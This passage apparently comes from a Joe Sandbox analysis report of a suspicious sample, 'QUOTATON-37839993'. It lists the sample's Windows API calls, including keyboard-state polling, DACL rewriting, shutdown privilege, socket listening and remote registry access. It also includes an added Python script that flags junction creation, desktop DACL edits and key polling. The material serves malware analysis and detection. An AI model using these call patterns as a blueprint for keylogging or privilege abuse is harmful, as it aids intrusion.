                                                                      • CopySid.ADVAPI32(00000000), ref: 00E57E0C
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E57E3D
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E57E63
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E57E77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                      • String ID:
                                                                      • API String ID: 3996160137-0
                                                                      • Opcode ID: c54f72ca4ed4333e88b16d59bcb71625a1e6aab508d7c7820bc6d8204a012204
                                                                      • Instruction ID: 6fd29047cc437333ae1cbb9941836bb328ca63d158f0068df5845346106483a5
                                                                      • Opcode Fuzzy Hash: c54f72ca4ed4333e88b16d59bcb71625a1e6aab508d7c7820bc6d8204a012204
                                                                      • Instruction Fuzzy Hash: 63617971900209AFDF00CFA1EC85AEEBBB9FF04305F048669F955B6291DB319E19CB60
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00E60097
                                                                      • SetKeyboardState.USER32(?), ref: 00E60102
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E60122
                                                                      • GetKeyState.USER32(000000A0), ref: 00E60139
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E60168
                                                                      • GetKeyState.USER32(000000A1), ref: 00E60179
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00E601A5
                                                                      • GetKeyState.USER32(00000011), ref: 00E601B3
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00E601DC
                                                                      • GetKeyState.USER32(00000012), ref: 00E601EA
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E60213
                                                                      • GetKeyState.USER32(0000005B), ref: 00E60221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                                                                      • Instruction ID: cf13f563b1a5337f0984e072f13cc93c14347db2539b5a4d5ef9c54f06ffe161
                                                                      • Opcode Fuzzy Hash: d138cec870dbe46dc636e0c19d6460869130fdca8f7cc8ab3c8727308e20b837
                                                                      • Instruction Fuzzy Hash: 785109209843A829FB35DBA0A8147EBBFF49F123C4F085599C5C2761C3DAA49B8CC761
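The raw arguments in the three records above are easier to read once decoded: in the CreateDirectoryW / CreateFileW / DeviceIoControl record, 0x40000000 is GENERIC_WRITE, creation disposition 3 is OPEN_EXISTING, 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT and control code 0x000900A4 is CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS), i.e. FSCTL_SET_REPARSE_POINT, which together with the "\??\%s" string is the sequence used to create an NTFS junction; in the GetUserObjectSecurity / AddAce / SetUserObjectSecurity record, 4 is DACL_SECURITY_INFORMATION and the read-edit-write of a user object's DACL is the setup normally done on a window station and desktop before starting a process as another user; in the key-state record, A0/A1/11/12/5B are VK_LSHIFT, VK_RSHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN. The following Python triage script is an added example, not part of this report or of Joe Sandbox's tooling: it parses "APIs" bullet lines in the format used on this page, performs those decodings, and flags the three sequences. The embedded sample records are excerpts of the listing above; the rule names and interpretation strings (junction creation, window station/desktop DACL rewrite, modifier-key polling) are my assumptions, consistent with but not confirmed by the report.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox report.
Added example, not part of the report or of Joe Sandbox: parses the bullet lines
in the format used above, decodes raw numeric arguments and flags call sequences
worth a closer look. Sample records are excerpts of the listing; rule names are mine.
"""
import re
from collections import namedtuple

Call = namedtuple("Call", "api module args ref subcall")

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall
# function X:"; LIBCMT entries carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

def parse_arg(tok):
    """'?' is an unresolved value, 8 hex digits a number, anything else a string."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-F]{8}", tok) else tok

def parse_record(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls

def decode_ctl_code(code):
    """Undo CTL_CODE(): device << 16 | access << 14 | function << 2 | method."""
    return {"device": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": code & 3}

FILE_DEVICE_FILE_SYSTEM = 0x9
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}
CREATEFILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT"}
MODIFIER_VKS = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
                0x12: "VK_MENU", 0x5B: "VK_LWIN"}
DACL_SECURITY_INFORMATION = 0x4

def triage(calls):
    """Human-readable findings for one function's call list."""
    findings = []
    for c in calls:
        if c.api == "DeviceIoControl" and len(c.args) > 1 and isinstance(c.args[1], int):
            d = decode_ctl_code(c.args[1])  # match on device + function, not the whole constant
            if d["device"] == FILE_DEVICE_FILE_SYSTEM and d["function"] in FSCTL_FUNCTIONS:
                findings.append(f"{FSCTL_FUNCTIONS[d['function']]} via DeviceIoControl at {c.ref:08X}")
        if c.api == "CreateFileW" and len(c.args) > 5 and isinstance(c.args[5], int):
            flags = [n for bit, n in CREATEFILE_FLAGS.items() if c.args[5] & bit]
            if flags:
                findings.append("CreateFileW with " + "|".join(flags))
    polled = sorted({MODIFIER_VKS[c.args[0]] for c in calls
                     if c.api in ("GetAsyncKeyState", "GetKeyState")
                     and c.args and c.args[0] in MODIFIER_VKS})
    if polled:
        findings.append("modifier keys polled: " + ", ".join(polled))
    # Read-edit-write of a user object's (window station/desktop) DACL is the
    # setup done before starting a process as another user (assumption: this is
    # what the report's "execute programs as a different user" signature saw).
    own = {c.api for c in calls if not c.subcall}
    if "AddAce" in own and any(c.api == "SetUserObjectSecurity" and len(c.args) > 1
                               and c.args[1] == DACL_SECURITY_INFORMATION for c in calls):
        findings.append("window station/desktop DACL rewritten (AddAce -> SetUserObjectSecurity)")
    return findings

def triage_text(text):
    return triage(parse_record(text))

# Constructed test input: excerpts of three records from the listing above.
JUNCTION_RECORD = """
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A293
• _wcsncpy.LIBCMT ref: 00E6A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A323
• RemoveDirectoryW.KERNEL32(?), ref: 00E6A337
"""
DACL_RECORD = """
  • Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E57D13
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E57E3D
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E57E63
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E57E77
"""
KEYSTATE_RECORD = """
• GetAsyncKeyState.USER32(000000A0), ref: 00E60122
• GetKeyState.USER32(000000A1), ref: 00E60179
• GetAsyncKeyState.USER32(00000011), ref: 00E601A5
• GetKeyState.USER32(00000012), ref: 00E601EA
• GetAsyncKeyState.USER32(0000005B), ref: 00E60213
"""

if __name__ == "__main__":
    for name, rec in (("junction", JUNCTION_RECORD), ("dacl", DACL_RECORD), ("keys", KEYSTATE_RECORD)):
        print(name, triage_text(rec))
```

Feed `triage_text()` the APIs block of any other record on this page to apply the same rules. The FSCTL rule keys on the device type (9, FILE_DEVICE_FILE_SYSTEM) and function number (41) rather than on the full constant, so it still fires if the same request is issued with a different access or method field; the DACL rule only counts AddAce in the function's own body, so a record that merely inherits it through a subcall does not match.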
                                                                      APIs
                                                                        • Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E804AC
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E8054B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E805E3
                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E80822
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E8082F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1240663315-0
                                                                      • Opcode ID: 457f622822026aa0ad08c9f80666118461575d2fdf12560a7d231217e0367582
                                                                      • Instruction ID: efe9a624e5b3d8ac6be923888759cd1b57cf9ad4e9edfa9fde60ac7b3bfff412
                                                                      • Opcode Fuzzy Hash: 457f622822026aa0ad08c9f80666118461575d2fdf12560a7d231217e0367582
                                                                      • Instruction Fuzzy Hash: 40E15F71604200AFCB54EF24C891E6ABBE4EF89314F04996DF84DEB2A2D731ED45CB91
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • CoInitialize.OLE32 ref: 00E78403
                                                                      • CoUninitialize.OLE32 ref: 00E7840E
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00E92BEC,?), ref: 00E7846E
                                                                      • IIDFromString.OLE32(?,?), ref: 00E784E1
                                                                      • VariantInit.OLEAUT32(?), ref: 00E7857B
                                                                      • VariantClear.OLEAUT32(?), ref: 00E785DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 834269672-1287834457
                                                                      • Opcode ID: 66c60cea0c63f59efab0e0613948b42232e63f4734d4b74aa33b0f191ba889bd
                                                                      • Instruction ID: 5502097fe410106ef4fb15bf2aa88fc749cb4491f815a172232a69716bd648a2
                                                                      • Opcode Fuzzy Hash: 66c60cea0c63f59efab0e0613948b42232e63f4734d4b74aa33b0f191ba889bd
                                                                      • Instruction Fuzzy Hash: B761E1706483129FC710DF14DA4CFAAB7E8AF54744F009419F989BB291DB70ED48CB92
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: bd6e2da9af2afde42ab9e5f805371e65a78a49e4da8f6d9f166df428491914b5
                                                                      • Instruction ID: 142799d15ed04d29e29f5948a8bb7ad935eee7b4781ca2c985b8228a74d4dff0
                                                                      • Opcode Fuzzy Hash: bd6e2da9af2afde42ab9e5f805371e65a78a49e4da8f6d9f166df428491914b5
                                                                      • Instruction Fuzzy Hash: 6E219F75201614DFDB14AF65EC09B697BA8EF04711F10C029F94AFB2B2DB30AC55CB94
                                                                      APIs
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                        • Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E638A3
                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E6394B
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E6395E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E6397B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6399D
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E639B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4002782344-1173974218
                                                                      • Opcode ID: c49955de5a6a06f1c8e5ea1215d46d951cf12fdba8117a532d2f5f1cf56d6d66
                                                                      • Instruction ID: 09f6d81ae170f1e02ed671713bf55bae9c0deb8ee3d7837fba6eb988d77fdd98
                                                                      • Opcode Fuzzy Hash: c49955de5a6a06f1c8e5ea1215d46d951cf12fdba8117a532d2f5f1cf56d6d66
                                                                      • Instruction Fuzzy Hash: 3C519D7184414DAECF05EBA0EA929EEB7B8AF54344F602069E446B71D1EB316F49CF60
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E6F440
                                                                      • Sleep.KERNEL32(0000000A), ref: 00E6F470
                                                                      • _wcscmp.LIBCMT ref: 00E6F484
                                                                      • _wcscmp.LIBCMT ref: 00E6F49F
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 00E6F53D
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6F553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                      • String ID: *.*
                                                                      • API String ID: 713712311-438819550
                                                                      • Opcode ID: baf94cd46f57d4e054450e9c2df576e2b9d4f913944c3b448d278807af3ee531
                                                                      • Instruction ID: 964623a4d7e978b96b6294b22295b3f2b16099936924f049a57c4138f048af7a
                                                                      • Opcode Fuzzy Hash: baf94cd46f57d4e054450e9c2df576e2b9d4f913944c3b448d278807af3ee531
                                                                      • Instruction Fuzzy Hash: 86418D72840219AFCF14EF64EC45AEEBBB4FF04354F105466E819B2191EB309E84CF50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __itow__swprintf
                                                                      • String ID: 3c$_
                                                                      • API String ID: 674341424-4099079164
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      APIs
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                        • Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E63B89
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E63BD9
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E63BEA
                                                                      • FindClose.KERNEL32(00000000), ref: 00E63C01
                                                                      • FindClose.KERNEL32(00000000), ref: 00E63C0A
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      APIs
                                                                        • Part of subcall function 00E587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
                                                                        • Part of subcall function 00E587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
                                                                        • Part of subcall function 00E587E1: GetLastError.KERNEL32 ref: 00E58865
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E651F9
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-194228
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E762DC
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E762EB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E76307
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00E76316
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E76330
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E76344
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                      • String ID:
                                                                      • API String ID: 1279440585-0
                                                                      APIs
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                      • _memmove.LIBCMT ref: 00E50258
                                                                      • _memmove.LIBCMT ref: 00E5036D
                                                                      • _memmove.LIBCMT ref: 00E50414
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1300846289-0
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E019FA
                                                                      • GetSysColor.USER32(0000000F), ref: 00E01A4E
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E01A61
                                                                        • Part of subcall function 00E01290: DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                                                                      Similarity
                                                                      • API ID: ColorProc$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 3744519093-0
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E6BCE6
                                                                      • _wcscmp.LIBCMT ref: 00E6BD16
                                                                      • _wcscmp.LIBCMT ref: 00E6BD2B
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E6BD3C
                                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E6BD6C
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 2387731787-0
                                                                      APIs
                                                                        • Part of subcall function 00E77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77DB6
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E7679E
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E767C7
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E76800
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E7680D
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00E76821
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 99427753-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                      • String ID:
                                                                      • API String ID: 292994002-0
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E580C0
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E580CA
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                                                                      • Instruction ID: f325f17ada38344aaa19c215ba850c1c76573970159c1c155df275cbab9e8cb1
                                                                      • Opcode Fuzzy Hash: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                                                                      • Instruction Fuzzy Hash: 1AF06231242304EFEB104FA6ED8DE673BACEF49759B100425F949F6150DB61DC49EB60
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04AD0), ref: 00E04B45
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E04B57
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                                                                      • Instruction ID: 14eb25156c0239955aa11ae88cc7347d0cbe2539141eb4302ce67b77bdcf7c71
                                                                      • Opcode Fuzzy Hash: b8e616ddfd09f029ecfb5673ce8c16b0d4d21e6b73e51776172a8e16b672cc2e
                                                                      • Instruction Fuzzy Hash: 0FD017B4A10B13CFD720AF32E928B0676E4AF45795B11983AD48EF6190E674E8C0CB54
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7EE3D
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E7EE4B
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E7EF0B
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7EF1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
